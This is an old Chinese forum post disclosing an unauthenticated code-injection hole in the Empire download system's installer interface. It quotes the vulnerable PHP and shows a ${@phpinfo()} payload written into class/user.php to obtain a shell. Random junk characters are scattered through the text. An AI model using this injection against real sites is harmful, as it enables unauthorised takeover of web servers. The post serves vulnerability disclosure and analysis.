找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2407|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们# d; }+ O4 n+ Y; C7 v4 N

( }! ^' P1 @3 _- i

" Q4 A  w/ W3 _
这是帝国的一套下载系统 如图
" ^8 W: D" R: N- A+ ^ps(不需要任何账户和密码,直接写shell)


5 c( e5 r, _# _2 l8 C8 J, b

由于很多站是由于下载要整合discuz 等等一些论坛....$ e$ ^8 R& |! N6 L$ {; H$ D3 Q4 K

5 T+ i" v/ G; c0 m

而帝国他又有一个万能接口,如图


* s" d- f& \2 I; O
1 g. ?! q. U- _, C# C* o2 Y( }4 A' P1 L: [+ J. p8 k/ q

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码( c, A+ s! N/ [) W/ Y$ t( R

' P1 V4 K+ K8 ^- w; e/ K当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪4 B% O- d1 f5 Y6 K. @+ ?

2 Z' f- c* Z" b" V& S在data/fun.php中的15行  D* ^5 t+ I7 A0 }  G) c

# d9 p7 `$ {5 F, T我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
8 i4 h  z1 D/ Z* Q$ S, \0 ?/ H" d
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干  B- l- G" S! w$ {+ Y

" u* f% P! ]1 {6 k这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);; Y7 @" ~. \$ y! ^
& E7 O, f; x8 ]' @
他将传进来的变量进行了切割,然后赋给了$filetext
/ b" O! s. o  _$ W( Z. W, @% q) L9 K1 j5 A: D' _$ X
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了8 o; s0 x4 P5 T
1 A: m! A5 Y) h2 j
我们看看写入的结果,随便填一个

4 k% T  ~5 F& K2 F* y; ]- ~3 j
% p% G) B! k( J0 g) D9 m; l

4 J" V, w1 V9 ~
5 q5 Y8 @; F. r* f) Q/ V) U3 s7 E7 B$ a5 q- s
5 @0 M- W1 g- k6 ^4 H

: G* O' g1 @9 I3 o
5 K+ c9 D2 A# H2 Y1 A6 U' [
" h8 q( r7 d7 N) Q( F, U
- T# l6 l9 ?5 v2 N5 u8 P" l

. F9 c- O* _: L; B6 k$ D8 v2 l6 }  z* ~& B4 R4 A5 R( t. {0 P8 H( }
/ T; c; b7 e. o0 v6 h0 [" P' t

& A( ?% j1 `/ {+ [9 k2 h

8 A: C0 b% m- z/ N  e) V& n2 t! u" e! y0 P" Y
# I3 [  A  }" T% f: z: j

/ {! V& u3 D! W2 z# F7 e1 ]' X
* m" s/ z. i% o5 w) Y+ r2 t4 N7 K$ m, G

# i/ G% Y: `" d  _% f2 w/ n: @" i4 G1 m

所以我们淫荡点,写个${@phpinfo()}试试


( Q  B8 V" q: ]' w

然后访问以下class/user.php这个文件" c, H& ^- r2 M
日了吧

: R, b) z$ E) p1 n( m! q  E
# a7 F% ]" i  [7 h4 v. ?& ]
3 u& E5 L5 X3 B. Y5 ?7 {0 I
1 b+ o4 K3 R5 _( x

9 Q# S; h9 G/ Q7 Y5 {$ L8 v" h
) |2 T0 g- a: T& ^

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表